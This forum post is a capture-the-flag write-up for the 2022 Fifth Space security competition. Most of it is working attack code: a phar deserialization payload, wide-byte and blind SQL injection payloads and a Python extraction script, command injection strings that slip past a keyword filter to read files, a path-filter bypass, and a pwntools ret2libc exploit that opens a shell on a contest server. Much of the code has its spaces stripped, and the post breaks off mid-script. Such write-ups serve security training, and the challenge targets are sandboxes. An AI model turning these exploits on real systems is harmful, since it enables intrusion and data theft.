Jump to content

Title: 2022 Fifth Space Cyber Security Competition WriteUp

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

1. WEB

1.web_BaliYun

After entering, a file is uploaded, and only pictures can be uploaded. Visit www.zip to get the source code

1049983-20220922090556835-1442997120.png Website source code: index.php:php

include('class.php');

if(isset($_GET['img_name'])){

$down=newcheck_img();#here

echo$down-img_check();

}

if(isset($_FILES['file']['name'])){

$up=newupload();

echo$up-start();

}

?

class.php:php

classupload{

public$filename;

public$ext;

public$size;

public$Valid_ext;

publicfunction__construct(){

$this-filename=$_FILES['file']['name'];

$this-ext=end(explode('.',$_FILES['file']['name']));

$this-size=$_FILES['file']['size']/1024;

$this-Valid_ext=array('gif','jpeg','jpg','png');

}

publicfunctionstart(){

return$this-check();

}

privatefunctioncheck(){

if(file_exists($this-filename)){

return 'Imagealreadyexsists';

}elseif(!in_array($this-ext,$this-Valid_ext)){

return 'OnlyImageCanBeUploaded';

}else{

return$this-move();

}

}

privatefunctionmove(){

move_uploaded_file($_FILES['file']['tmp_name'],'upload/'.$this-filename);

return 'Uploadsuccsess!';

}

publicfunction__wakeup(){

echofile_get_contents($this-filename);#here2

}

}

classcheck_img{

public$img_name;

publicfunction__construct(){

$this-img_name=$_GET['img_name'];#here

}

publicfunctionimg_check(){

if(file_exists($this-img_name)){#here1

return 'Imageexsists';

}else{

return 'Imagennoteexsists';

}

}

} It is obvious that phar is deserialized, upload and then include it. The code also gives the upload directory as upload and the file name has not changed.

For more information about phar deserialization, please refer to

Detailed explanation of php deserialization expansion attack--phar: https://xz.aliyun.com/t/6699

Phar and Stream Wrapper cause in-depth mining of PHP RCE : https://xz.aliyun.com/t/2958

#test.php

?php

classupload{

public$filename;

publicfunction__construct(){

$this-filename='file:///flag';

}

}

$phar=newPhar('Tao.phar');

$phar-stopBuffering();

$phar-setStub('GIF89a'.'?php__HALT_COMPILER();');

$phar-addFromString('test.txt','test');

$payload=newupload();

$phar-setMetadata($payload);

$phar-stopBuffering();

php--definedphar.readonly=0test.php

mvTao.pharTao.gif

I saw the function file_exists that can start phar in the class. And functions that can read flags. Then the idea is very clear. Directly upload a Tao.gif, the content is the upload class, and the property filename is /flag. Then pass the img_name to phar://upload/Tao.gif to trigger our phar package

Upload Tao.gif, then?img_name=phar://upload/Tao.gif can get flag.

ouo@GOTA:~$curl-vvhttp://39.107.82.169:27417/index.php?img_name=phar://upload/Tao.gif|grep'flag'

.............

GET/index.php?img_name=phar://upload/Tao.gifHTTP/1.1

Host:39.107.82.169:27417

User-Agent:curl/7.58.0

Accept:*/*

HTTP/1.1200OK

Date:Mon,19Sep202210:42:08GMT

Server:Apache/2.4.25(Debian)

X-Powered-By:PHP/5.6.40

Vary:Accept-Encoding

Content-Length:1925

Content-Type:text/html;charset=UTF-8

.............

flag{s8HJQg5ftEJ9Kcc65Mn55K9XjRRgYVQg}

2.easylogin

SQL injection. When burp caught the packet, it found gbk garbled code and realized it was wide byte injection.

username=admin%df'password=admin

Report an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin�'' at line 1

Test joint injection discovery :

1049983-20220922090557623-1116459392.jpg always has syntax errors. After troubleshooting, it is found that select and union will be replaced with empty, so it is simpler to bypass it by using double write.

Direct joint injecting passwords cannot be logged in. I think that the regular site development password will be md5, so I use md5 to encrypt it. Since I cannot use quotes, I choose hexadecimal bypass.

1049983-20220922090558263-459598854.jpg

Create a virtual table and log in directly. The background logic is MD5 comparison. There is a similar original question username=admin%df%27ununion%0aseselectlect%0a66,66,0x3437626365356337346635383966343836376462643537653963613966383038#password=aaa

The question prompts a weak password, and the password is blasted admin123

1049983-20220922090558895-1246514747.png

GET/index.php?ip=127.0.0.1%0AlsHTTP/1.1

Host:39.107.75.148:19304

Pragma:no-cache

Cache-Control:no-cache

Upgrade-Insecure-Requests:1

User-Agent:Mozilla/5.0 (WindowsNT10.0; WOW64)AppleWebKit/537.36 (KHTML, likeGecko)Chrome/86.0.4240.198Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer:http://39.107.75.148:19304/index.php?ip=ip

Accept-Encoding:gzip,deflate

Accept-Language:zh-CN,zh;q=0.9

Cookie:PHPSESSID=r4mutkqgni200nfu6ar3qj3jp7;td_cookie=3097567335

Connection:close 1049983-20220922090559527-52671451.jpg

#Read source code

?ip=127.0.0.1%0Apaste%09index.phpArray

(

[0]=?php

[1]=

[2]=header('Content-type:text/html;charset=utf-8');

[3]=

[4]=//Open Session

[5]=

[6]=session_start();

[7]=

[8]=

[9]=

[10]=//First determine whether the cookie remembers the user information

[11]=

[12]=if(isset($_COOKIE['username'])){

[13]=

[14]=#If you remember the user information, it will be directly transmitted to Session

[15]=

[16]=$_SESSION['username']=$_COOKIE['username'];

[17]=

[18]=$_SESSION['islogin']=1;

[19]=

[20]=}

[21]=

[22]=if(isset($_SESSION['islogin'])){

[23]=

[24]=//If you have logged in

[25]=

[26]=

[27]=$res=FALSE;

[28]=

[29]=if(isset($_GET['ip'])$_GET['ip']){

[30]=$ip=$_GET['ip'];

[31]=$m=[];

[32]=if(!preg_match_all('/(\|||;||\/|cat|flag|touch|more|curl|scp|kylin|echo|tmp|var|run|find|grep|-|`|'|:|||less|more)/',$ip,$m)){

[33]=$cmd='ping-c4{$ip}';

[34]=exec($cmd,$res);

[35]=}else{

[36]=$res='Hacker, there is an illegal statement';

[37]=}

[38]=}

[39]=

[40]=

[41]=}else{

[42]=

[43]=//If not logged in

[44]=

[45]=echo'You are not logged in yet, please ahref='login.html'login/a';

[46]=

[47]=}

[48]=

[49]=? Regular interception is as follows:

If(!preg_match_all('/(\|||;||\/|cat|flag|touch|more|curl|scp|kylin|echo|tmp|var|run|find|grep|-|`|'|:|||less|more)/',$ip,$m)) found kylin in the current directory, filtering also found kylin, guessing that flag is in this directory, but because/is intercepted, I try to enter the directory and read the file, but the question filters kylin, using the characteristics of the linux system, and check the directory file regularly.

#Read the kylin directory

?ip=127.0.0.1%0Als%09ky?#Output:

preArray

(

[0]=flag.txt

)

/pre#finalpayload

?ip=127.0.0.1%0Acd%09ky?%0apaste%09fl*#%09=''(tab), in fact ${IFS} can also

?ip=127.0.0.1%0Acd%09ky?%0apaste${IFS}fl*

?ip=127.0.0.1%0Aca''t${IFS}$(fi''nd${IFS}.) 1049983-20220922090600188-1514996600.png 1049983-20220922090600854-1673436991.jpg

4.web_Eeeeasy_SQL

Source code: Use hexadecimal characters to compare directly, and use case when one by one to come out. Use binary to be case sensitive.

1049983-20220922090601456-1710777780.png

Direct note of the script importrequests

proxy={'http':'127.0.0.1:8080'}

result='0x'

k=0forjinrange(100):

foriinrange(33,126):

k=hex(i)

k=k[2:]

result+=k

password='or(case\x09when\x09(binary\x09username'+result+')\x09then\x091\x09else\x09223372036854775807+1\x09end)#'

data={'username':'aa\\','password':password}

re=requests.post(data=data,url=url,proxies=proxy,allow_redirects=False)

#sleep(0.1)

print(re.status_code)

if'msg'notinre.text:

result=result[:-2]

l=hex(i-1)

l=l[2:]

result+=l

print(result)

break

else:

result=result[:-2] Finally, the username=Flag_Accountpassword=G1ve_Y0u_@_K3y_70_937_f14g! After submitting login, you can see that it is a simple readfile. Just filter /flag, you can't use /flag directly. Just use /proc/self/root/flag to bypass?phpsession_start();if(isset($_SESSION['name'])){if($_SESSION['name']==='Flag_Account'){$file=urldecode($_GET['file']);if(! preg_match('/^\/flag|var|tmp|php|log|\%|sess|etc|usr|\.|\:|base|ssh|http/i',$file)){readfile($file);}else{echo'tryagain~';}}show_source(__FILE__);}else{echo'Login~';}

1049983-20220922090602071-124416845.jpg

1049983-20220922090602648-1448644284.png

2. Pwn

1. H3ll0Rop

Basic ret2libc

frommpwnimport*

context.log_level='debug'#p=process('./H3ll0Rop')

p=remote('47.93.30.67',52705)

elf=ELF('./H3ll0Rop')

libc=ELF('./libc-2.23.so')

pop_rdi=0x00000000000400753#vuln=0x400647

vuln=0x4006CC#leaklibc

payload=b'a'*(0x60+0x8)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(vuln)

p.sendlineafter(b'me?',payload)

libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']

print('libc_base',hex(libc_base))

system=libc_base+libc.sym['system']

binsh=libc_base+next(libc.search(b'/bin/sh'))#getshell

payload=b'a'*(0x60+0x8)+p64(pop_rdi)+p64(binsh)+p64(system)+p64(vuln)

p.sendlineafter(b'me?',payload)

p.interactive()p.close()

2.5_1H3ll0Rop

frommpwnimport*

context(os='linux',arch='amd64')

context.log_level=True

e

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.